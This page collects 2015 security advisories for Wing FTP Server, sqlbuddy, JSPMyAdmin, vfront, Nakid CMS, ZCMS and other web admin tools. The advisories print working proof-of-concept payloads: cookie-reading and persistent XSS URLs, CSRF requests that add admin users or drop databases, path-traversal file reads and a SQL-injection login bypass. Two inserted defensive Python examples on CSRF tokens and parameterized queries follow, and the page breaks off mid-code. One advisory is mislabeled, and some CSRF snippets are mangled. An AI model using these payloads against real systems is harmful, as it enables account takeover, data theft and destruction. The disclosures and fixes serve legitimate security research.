CSRF & XSS Wing FTP Server Admin <= v4.4.5
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities

Release Date:
2015-04-28

Source:
http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt

Common Vulnerability Scoring System:
Overall CVSS Score 8.9

Product:
Wing FTP Server is a web based administration FTP client that supports the following protocols: FTP, FTPS, HTTPS, SSH.

Advisory Information:
CSRF & client-side cross site scripting web vulnerability within Wing FTP Server Admin that allows adding arbitrary users to the system.

Vulnerability Disclosure Timeline:
March 28, 2015: Vendor Notification
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new version 4.4.6
April 28, 2015: Public Disclosure - John Page

Affected Product(s):
Wing FTP Server Admin 4.4.5

Product:
Wing FTP Server - Admin

Exploitation Technique:
Remote

Severity Level:
High

Technical Details & Description:
Request Method(s):
[+] POST & GET
Vulnerable Product:
[+] Wing FTP Server Admin <= 4.4.5
Vulnerable Parameter(s):
[+] domain & type
Affected Area(s):
[+] Server Admin

Proof of Concept (POC):
The CSRF and client-side cross site scripting web vulnerability can be exploited by remote attackers without a privileged application user account and with low user interaction (click). The payload will add arbitrary users to the system.

PoC: Example
http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]

POC: Add arbitrary user:
http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemasks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E

POC XSS:
http://localhost:5466/admin_viewstatus.html?domain=[XSS VECTOR]

POC XSS:
http://localhost:5466/admin_event_list.html?type=[XSS VECTOR]

Solution - Fix & Patch:
Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server)

Security Risk:
The security risk of the CSRF client-side cross site scripting web vulnerability in the `domain` admin_loglist.html value has a CVSS score of 8.9.

Credits & Authors:
John Page ( hyp3rlinx ) @apparitionsec

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. The security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domains: hyp3rlinx.altervista.org
Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability
Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability.

Vendor:
http://www.sqlbuddy.com

Release Date:
05-08-2015

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt

Product:
sqlbuddy version 1.3.3
SQL Buddy is an open source web based MySQL administration application.

Advisory Information:
sqlbuddy suffers from directory traversal whereby a user can move about directories and read any PHP and non-PHP files by appending the '#' hash character when requesting files via URLs, e.g. .doc, .txt, .xml, .conf, .sql etc. After adding the '#' character as a delimiter, any non-PHP file will be returned and rendered, subverting the .php concatenation used by sqlbuddy when requesting PHP pages via the POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=

POC exploit payloads:
1- Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#
2- Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#
3- Read phpinfo (no need for '#' as phpinfo is a PHP file):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo

Disclosure Timeline:
Vendor Notification N/A
May 8, 2015: Public Disclosure - hyp3rlinx

Exploitation Technique:
Create a test file with a non-.php extension in some htdocs directory, then request the page in the browser.
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#

Severity Level:
High

Description:
Request Method(s):
[+] POST
Vulnerable Product:
[+] sqlbuddy 1.3.3
Vulnerable Parameter(s):
[+] #page=somefile
Affected Area(s):
[+] Server directories & sensitive files

Solution - Fix & Patch:
N/A

Credits:
John Page ( hyp3rlinx )

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. The security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domains: hyp3rlinx.altervista.org
Sidu 5.2 Admin XSS Vulnerability
Affected Vendor:
www.topnew.net/sidu/

Credits:
John Page ( hyp3rlinx )

Domains:
hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt

Product:
Sidu version 5.2 is a web based database front-end administration tool.

Advisory Information:
Sidu 5.2 is vulnerable to cross site scripting attacks.

Exploit code:
http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E

Disclosure Timeline:
Vendor Notification May 12, 2015
May 13, 2015: Public Disclosure

Severity Level:
High

Description:
Request Method(s):
[+] GET
Vulnerable Product:
[+] Sidu 5.2
Vulnerable Parameter(s):
[+] sql=[XSS]
Affected Area(s):
[+] Admin of currently logged in user.

(hyp3rlinx)
DbNinja 3.2.6 Flash XSS Vulnerabilities
# Exploit Title: DbNinja Flash XSS Exploit
# Google Dork: intitle: Flash XSS
# Date: May 27, 2015
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: www.dbninja.com
# Software Link: www.dbninja.com
# Version: 3.2.6
# Tested on: Windows 7
# Category: Flash XSS
# CVE : NA

Source:
http://hyp3rlinx.altervista.org/advisories/AS-DBNINJA0527.txt

Product:
DbNinja is a web based application for MySQL database administration.

Advisory Information:
DbNinja multiple Flash based XSS vulnerabilities

Vulnerability Details:
The DbNinja Flash uploader component contains 2 SWF files that use the Flash 'ExternalInterface' API to call Javascript functions. These SWFs can be exploited by supplying malicious code as parameters to those functions from the URL. The text value "Copy to Clipboard" can also be changed using the "buttonText" parameter.

Exploit code(s):
1- http://localhost/dbninja/dbninja/js/lib/uploader.swf?selectCallback=alert(document.cookie)
2- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?buttonText=DbNinja%20Login&dataSourceFunc=alert(document.cookie)
3- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?completeCallback=alert(document.cookie)

Disclosure Timeline:
Vendor Notification May 23, 2015
May 27, 2015: Public Disclosure

Severity Level:
High

Description:
Request Method(s):
[+] GET
Vulnerable Product:
[+] DBNinja 3.2.6
Vulnerable Parameter(s):
[+] selectCallback, dataSourceFunc & completeCallback
Affected Area(s):
[+] uploader.swf, clipboard.swf

(hyp3rlinx)
JSPMyAdmin SQL Injection, CSRF & XSS Vulnerabilities
Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source: http://hyp3rlinx.altervista.org/advisories/AS-JSPMYADMIN0529.txt

Vendor:
code.google.com/p/jsp-myadmin

Product:
JSPAdmin 1.1 is a Java web based MySQL database management system.

Advisory Information:
JSPMyAdmin 1.1 SQL Injection, CSRF & XSS Vulnerabilities

Vulnerability Details:

SQL Injection:
deletedata.jsp is supposed to delete 1 field per query, yet we can control the SQL and build an OR condition. The problem is that the application uses concatenated user input to build SQL statements even though parameterized queries are used. In deletedata.jsp we find the following code:

con.prepareStatement("DELETE FROM " + table + " WHERE "+ field + "='" + val +"'");

So the expected SQL to be run is this, deleting 1 record, e.g.
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7

But the SQL Injection vulnerability lets us instead drop all fields using an SQL 'OR' statement, e.g.
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID or 'field'='NAME'

CSRF:
We can drop any database by sending the victim a malicious link, as there is no CSRF token used.

XSS:
There are zero user input checks, allowing remote attackers to execute arbitrary scripts in the context of an authenticated user's browser session.

Exploit code(s):

SQL Injection POC:
So the expected SQL to be run is this, deleting 1 record:
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID or 'field'='NAME'

CSRF POC:
http://127.0.0.1:8081/JSPMyAdmin/drop.jsp?db=mydb

XSS(s) POC:
1- alert('XSS By hyp3rlinx'); using the POST method in the 'host' parameter of the login page.
http://127.0.0.1:8081/JSPMyAdmin/
2- http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server=localhost&db="/>alert(666)
3- http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server="/>alert(666)&db=
4- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?db="/>alert(666);
5- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server=localhost&db=mysql&table="/>alert(666);
6- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server="/>alert(666);&db=
7- http://127.0.0.1:8081/JSPMyAdmin/query.jsp?server="/>alert(666)&db=
8- http://127.0.0.1:8081/JSPMyAdmin/export.jsp?db=test&table=alert(666)

Disclosure Timeline:
Vendor Notification: NA
May 29, 2015: Public Disclosure

Severity Level:
High

Description:
Request Method(s):
[+] GET / POST
Vulnerable Product:
[+] JSPMyAdmin 1.1
Vulnerable Parameter(s):
[+] host, server, db, table
Affected Area(s):
[+] Entire admin

(hyp3rlinx)
Enhanced SQL Portal 5.0.7961 XSS Vulnerability
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt

Vendor:
www.eliacom.com
www.eliacom.com/mysql-gui-download.php

Product:
Enhanced SQL Portal 5.0.7961 web based MySQL administration application.

Advisory Information:
Enhanced SQL Portal 5.0.7961 XSS Vulnerability

Vulnerability Details:
iframe.php contains an XSS vulnerability

Exploit code(s):
http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/>alert(666)

Disclosure Timeline:
Vendor Notification: May 28, 2015
June 2, 2015 : Public Disclosure

Severity Level:
Med

Description:
Request Method(s):
[+] GET
Vulnerable Product:
[+] Enhanced SQL Portal 5.0.7961
Vulnerable Parameter(s):
[+] id
Affected Area(s):
[+] iframe

(hyp3rlinx)
vfront-0.99.2 CSRF & Persistent XSS
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-VFRONT0602.txt

Vendor:
www.vfront.org

Product:
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.

Advisory Information:
CSRF, Persistent XSS & reflected XSS

Vulnerability Detail(s):

CSRF:
No CSRF token is in place, therefore we can add arbitrary users to the system.

Persistent XSS:
variabili.php has multiple XSS vectors using the POST method; one input field, 'altezza_iframe_tabella_gid', will store the XSS payload into the MySQL database, which will be run each time variabili.php is accessed from the victim's browser.

Persisted XSS stored in MySQL DB:
DB-> vfront_vfront
TABLE-> variabili
COLUMN--> valore (will contain our XSS)

Exploit code(s):

CSRF code, add arbitrary users to system:
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%...@x.com%26passwd%3dhacked%26passwd1%3dhacked');&tabella=&uid=&data_dal=All&data_al=All

Persistent XSS:
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
Inject XSS into the 'altezza_iframe_tabella_gid' input field to store it in the database.
"/>alert(666)

Reflected XSS(s):
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/>alert(666)

XSS vulnerable input fields:
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid <- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid

Disclosure Timeline:
Vendor Notification: May 31, 2015
June 2, 2015 : Public Disclosure

Severity Level:
High

Description:
Request Method(s):
[+] GET & POST
Vulnerable Product:
[+] vfront-0.99.2
Vulnerable Parameter(s):
[+] altezza_iframe_tabella_gid, passo_avanzamento_veloce_gid, n_record_tabella_gid, search_limit_results_gid, max_tempo_edit_gid, home_redirect_gid, formati_attach_gid, default_group_ext_gid, cron_days_min_gid, id_campo, op
Affected Area(s):
[+] Admin & MySQL DB

(hyp3rlinx)
Symphony CMS 2.6.2
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SYMPHONY0606.txt

Vendor:
www.getsymphony.com/download/

Product:
Symphony CMS 2.6.2

Advisory Information:
Symphony CMS XSS Vulnerability

Vulnerability Details:
The 'sort' parameter used by author search in Admin is XSS exploitable. Symphony seems to escape injected strings, e.g. 'HELL' becomes \'HELL\', but we can easily defeat that using the Javascript functions charCodeAt() & fromCharCode(), e.g. String.fromCharCode(72,69,76,76). Now we can output our 'HELL' strings, construct URLs etc.

Exploit XSS code(s):
http://localhost/symphony-2.6.2/symphony/system/authors/?sort=alert(String.fromCharCode(72,69,76,76))&order=asc

Disclosure Timeline:
Vendor Notification: June 5, 2015
June 6, : Public Disclosure

Severity Level:
Med

Description:
Request Method(s):
[+] GET
Vulnerable Product:
[+] Symphony CMS 2.6.2
Vulnerable Parameter(s):
[+] sort
Affected Area(s):
[+] symphony/system/authors/

(hyp3rlinx)
Symphony CMS XSS Vulnerability
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/

Vendor:
http://www.silverstripe.org/software/download

Product:
SilverStripe CMS & Framework v3.1.13

Advisory Information:
Unvalidated redirect & XSS vulnerabilities

Vulnerability Details:
Unvalidated redirect
XSS (reflected):

Exploit code(s):

Unvalidated redirect POC:
http://localhost/SilverStripe-cms-v3.1.13/dev/build?returnURL=[EVIL REMOTE FILE LOCATION]

XSS(s) POC:

Disclosure Timeline:
Vendor Notification:
June 7, 2015 : Public Disclosure

Severity Level:
High

Description:
Request Method(s):
[+] GET & POST
Vulnerable Product:
[+] SilverStripe CMS & Framework v3.1.13
Vulnerable Parameter(s):
[+]
Affected Area(s):
[+]

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

(hyp3rlinx)
Symphony CMS XSS Vulnerability [Corrected Post]
[Correction] of Vendor Info for Symphony CMS XSS Vulnerability POST on (Jun 08)

[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SYMPHONY0606.txt

Vendor:
www.getsymphony.com/download/

Product:
Symphony CMS 2.6.2

Advisory Information:
Symphony CMS XSS Vulnerability

Vulnerability Details:
The 'sort' parameter used by author search in Admin is XSS exploitable. Symphony seems to escape injected strings, e.g. 'HELL' becomes \'HELL\', but we can easily defeat that using the Javascript functions charCodeAt() & fromCharCode(), e.g. String.fromCharCode(72,69,76,76). Now we can output our 'HELL' strings, construct URLs etc.

Exploit XSS code(s):
http://localhost/symphony-2.6.2/symphony/system/authors/?sort=alert(String.fromCharCode(72,69,76,76))&order=asc

Disclosure Timeline:
Vendor Notification: June 5, 2015
June 6, : Public Disclosure

Severity Level:
Med

Description:
Request Method(s):
[+] GET
Vulnerable Product:
[+] Symphony CMS 2.6.2
Vulnerable Parameter(s):
[+] sort
Affected Area(s):
[+] symphony/system/authors/

(hyp3rlinx)
SilverStripe CMS Unvalidated Redirect & XSS vulnerabilities
[+] Credits: hyp3rlinx
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SILVERSTRIPE0607.txt

Vendor:
http://www.silverstripe.org/software/download

Product:
SilverStripe CMS & Framework v3.1.13

Advisory Information:
Unvalidated redirect & XSS vulnerabilities

Vulnerability Details:

Unvalidated redirect:
The 'returnURL' parameter for the following URL:
http://localhost/SilverStripe-cms-v3.1.13/dev/build
is open to abuse by supplying a malicious location or file.

XSS (reflected):
install.php is XSS vulnerable using the POST method for the following input fields.
admin_username
admin_password

Exploit code(s):

Unvalidated redirect POC:
http://localhost/SilverStripe-cms-v3.1.13/dev/build?returnURL=[EVIL REMOTE FILE LOCATION]

XSS POC:
http://localhost/SilverStripe-cms-v3.1.13/install.php
admin_username
admin_password
">alert(666)

Disclosure Timeline:
Vendor Notification: June 7, 2015
June 8, 2015 : Public Disclosure

Severity Level:
Med

Description:
Request Method(s):
[+] GET & POST
Vulnerable Product:
[+] SilverStripe CMS & Framework v3.1.13
Vulnerable Parameter(s):
[+] returnURL, admin_username & admin_password
Affected Area(s):
[+] install & dev

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

(hyp3rlinx)
Nakid-CMS CSRF, Persistent XSS & LFI
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NAKIDCMS0611.txt

Vendor:
http://kilrizzy.github.io/Nakid-CMS/

Product:
kilrizzy-Nakid-CMS-f274624
Nakid CMS is an open source content management system built using PHP and CodeIgniter.

Setup mode:
Under the root dir for Nakid CMS we set production mode instead of development in index.php, e.g.
define('ENVIRONMENT', 'production');

Advisory Information:
CSRF, Persistent XSS & Auth bypass LFI

Vulnerability Details:

Multiple CSRF(s) exist:
We have the ability to do the following as no CSRF tokens are present.
1- Change Admin password
2- Add arbitrary users to system
3- Alter system settings

XSS (persistent):
XSS parameter vulnerabilities exist for the following; payloads will be stored in the MySQL database and activated when a victim visits the vulnerable webpage.

XSS URL:
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users
On the "Edit Record" pop up dialog box.
Vulnerable parameters:
username
password
email
fname
lname

XSS URL:
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
On the "Edit Record" pop up dialog box.
Vulnerable parameters:
from_name
include_path
primary_email
from_email

XSS URL:
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1
Vulnerable parameter:
title

Authentication bypass LFI:
Local file inclusion to bypass access controls and read arbitrary files exists by setting the '$url' PHP variable on the following URL:
index.php/connector$url

Exploit POC code(s):

CSRF(s):
Condition: Persuade the victim to visit our webpage or click our link; if they have a session then we do our CSRF!

1- Add arbitrary user to system
function doit(){ var e=document.getElementById('ruinurlife') e.submit() }
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users"; method="post">

2- Change Admin password
function doit(){ var e=document.getElementById('ruinurlife') e.submit() }
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile"; method="post">

3- Alter system settings
function doit(){ var e=document.getElementById('ruinurlife') e.submit() }
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings"; method="post">

XSS persistent POC code:
Inject alert(666) into any of the vulnerable fields described above using the POST method. You need to highlight a row, then click the edit dialog box to edit settings, e.g.
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
from_name <--- alert(666)
include_path
primary_email
from_email

Authorization bypass LFI:
1- Logout, create a hell.txt file or whatever and put it in 'htdocs' or the web root, then visit the URL (change to suit your environment).
2- http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt
OR try
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php

Disclosure Timeline:
Vendor Notification: NA
June 11, 2015 : Public Disclosure

Severity Level:
High

Description:
Request Method(s):
[+] GET & POST
Vulnerable Product:
[+] kilrizzy-Nakid-CMS-f274624
Vulnerable Parameter(s):
[+] username, password, email, fname, lname, from_name, include_path, primary_email, from_email, title, connector$url
Affected Area(s):
[+] /system/users /system/profile /system/content_edit/

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission i
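The Nakid CMS, vfront, JSPMyAdmin and Wing FTP advisories above all turn on the same missing control: the user-adding, password-changing or settings POST carries no CSRF token, so a form on another origin can submit it with the victim's session cookie. The following Python is an added example, not code from any of those projects, of the synchronizer-token check such a handler needs; the HMAC token format, the request dict shape, the action names ('grid/users', 'system/profile') and SITE_ORIGIN are assumed for illustration.

```python
"""Synchronizer-token CSRF check for a state-changing POST (add user, change password, alter settings).

Added example, not code from Nakid CMS, vfront, JSPMyAdmin or Wing FTP Server. The token is an
HMAC over (session id, action, issue time) under a server-only key, so a forged cross-site form
cannot produce it, a token for one form cannot be replayed against another, and it expires.
"""
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret; never sent to the browser
TOKEN_TTL = 3600                        # seconds a form token stays valid
SITE_ORIGIN = "https://cms.example"     # assumed own origin, used for the Origin-header check


def _mac(session_id: str, action: str, issued: int) -> str:
    msg = f"{session_id}|{action}|{issued}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(session_id: str, action: str, now=None) -> str:
    """Token to embed in the form for one session and one action (e.g. 'grid/users')."""
    issued = int(time.time() if now is None else now)
    return f"{issued}:{_mac(session_id, action, issued)}"


def verify_token(session_id: str, action: str, token: str, now=None) -> bool:
    """Constant-time check that the token was issued for this session and action and is unexpired."""
    try:
        issued_s, mac = token.split(":", 1)
        issued = int(issued_s)
    except (ValueError, AttributeError):
        return False
    current = int(time.time() if now is None else now)
    if not 0 <= current - issued <= TOKEN_TTL:
        return False
    return hmac.compare_digest(_mac(session_id, action, issued), mac)


def handle_state_change(request: dict, session_id: str, action: str, now=None):
    """Gate in front of a handler such as add-user or change-password.

    request is a constructed dict: {"method": ..., "headers": {...}, "form": {...}}.
    Returns (status, message).
    """
    if request.get("method") != "POST":
        return 405, "state changes must be POST"
    # Defence in depth: browsers attach Origin to cross-site POSTs, so a mismatch is decisive.
    origin = request.get("headers", {}).get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    token = request.get("form", {}).get("csrf_token", "")
    if not verify_token(session_id, action, token, now):
        return 403, "missing or invalid CSRF token"
    return 200, f"{action}: accepted"


if __name__ == "__main__":
    sid = "sess-victim"
    # 1. The real add-user page embeds a token bound to this session and this action.
    tok = issue_token(sid, "grid/users")
    # 2. An auto-submitting form on another origin rides the cookie but has no token.
    forged = {"method": "POST", "headers": {"Origin": "https://attacker.example"},
              "form": {"username": "x", "password": "y"}}
    print(handle_state_change(forged, sid, "grid/users"))
    # 3. The genuine submission carries the token and is accepted.
    genuine = {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
               "form": {"username": "x", "password": "y", "csrf_token": tok}}
    print(handle_state_change(genuine, sid, "grid/users"))
```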
ZCMS SQL Injection & Persistent XSS
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ZCMS0612.txt

Vendor:
http://zencherry.com/
http://sourceforge.net/projects/zencherrycms

Product:
ZCMS 1.1 JavaServer Pages Content Management System

Advisory Information:
SQL Injection & Persistent XSS

Vulnerability Details:

SQL Injection:
Login to the admin area requires a password but is easily bypassed using the classic SQL Injection method, because the application uses concatenated user input to construct SQL queries.

ZCMS exploitable admin login code:
squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users WHERE status = 0 AND username = '"+username+"' AND password = '"+request.getParameter("pass") +"' AND type = 1 ;";

So we just supply an Admin password like ---> HELL' OR '2'='2 which will resolve as true!

SQL Inject XSS Payload:
We can also inject a persistent XSS payload directly into the MySQL database, subverting all character filtering by leveraging the existing SQL Injection vulnerabilities.

Persistent XSS:
Another persistent XSS vector is here in the author field for comments:
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number]

Exploit code(s):

1) Bypass admin login
localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
Enter 'admin' for the username field
Enter HELL' OR '2'='2 for the pass field

2) Inject XSS using SQL Injection
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=";alert(1) &content=alert(1)&author=alert(1) SATAN&visibility=1&type=1&comm=0

3) Persistent XSS field
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number]
Inject alert(666) in the author input field.

Disclosure Timeline:
Vendor Notification: NA
June 12, 2015 : Public Disclosure

Severity Level:
High

Description:
Request Method(s):
[+] GET & POST
Vulnerable Product:
[+] ZCMS_1.1
Vulnerable Parameter(s):
[+] pass, title, content, author
Affected Area(s):
[+] Admin, CMS

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

(hyp3rlinx)
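Both JSP advisories on this page (JSPMyAdmin's deletedata.jsp and the ZCMS login above) quote a query assembled by string concatenation, which is why `HELL' OR '2'='2` rewrites the predicate and why JSPMyAdmin's prepareStatement() call buys nothing. The Python below is an added example, not code from either project: it re-creates both statements against an in-memory sqlite3 database and shows the corrected forms, binding the values and allow-listing the identifiers that cannot be bound. The table layout, the sample rows and the ALLOWED_COLUMNS map are constructed for the demonstration.

```python
"""Parameter binding plus identifier allow-listing for the two concatenated JSP queries on this page.

Added example, not code from JSPMyAdmin or ZCMS. The vulnerable functions mirror the quoted
statements; the *_bound functions are the fix. sqlite3 stands in for MySQL.
"""
import sqlite3

TABLE_PREFIX = "zc_"                                  # stands in for the ZCMS TABLE_PREFIX constant
ALLOWED_COLUMNS = {"email": {"CATID", "NAME"}}        # identifiers the delete endpoint may name


def setup() -> sqlite3.Connection:
    """Constructed schema and rows for the demonstration."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE zc_users(username TEXT, password TEXT, status INT, type INT);"
        "INSERT INTO zc_users VALUES ('admin', 's3cret', 0, 1);"
        "CREATE TABLE email(CATID INT, NAME TEXT);"
        "INSERT INTO email VALUES (7, 'a'), (8, 'b'), (9, 'c');"
    )
    return con


def login_concat(con, username: str, pass_: str) -> bool:
    """The ZCMS login check, concatenated as the advisory quotes it (vulnerable)."""
    squerry = ("SELECT COUNT(username) AS usercount FROM " + TABLE_PREFIX + "users "
               "WHERE status = 0 AND username = '" + username + "' AND password = '"
               + pass_ + "' AND type = 1 ;")
    return con.execute(squerry).fetchone()[0] > 0


def login_bound(con, username: str, pass_: str) -> bool:
    """Same predicate with both values bound: a quote in the input is data, never syntax.

    (A real login would compare a password hash; the plaintext column mirrors the page's query.)
    """
    sql = ("SELECT COUNT(username) FROM " + TABLE_PREFIX + "users "
           "WHERE status = 0 AND username = ? AND password = ? AND type = 1")
    return con.execute(sql, (username, pass_)).fetchone()[0] > 0


def delete_concat(con, table: str, field: str, val: str) -> int:
    """JSPMyAdmin's deletedata.jsp statement as quoted (vulnerable). Returns rows deleted."""
    sql = "DELETE FROM " + table + " WHERE " + field + "='" + val + "'"
    return con.execute(sql).rowcount


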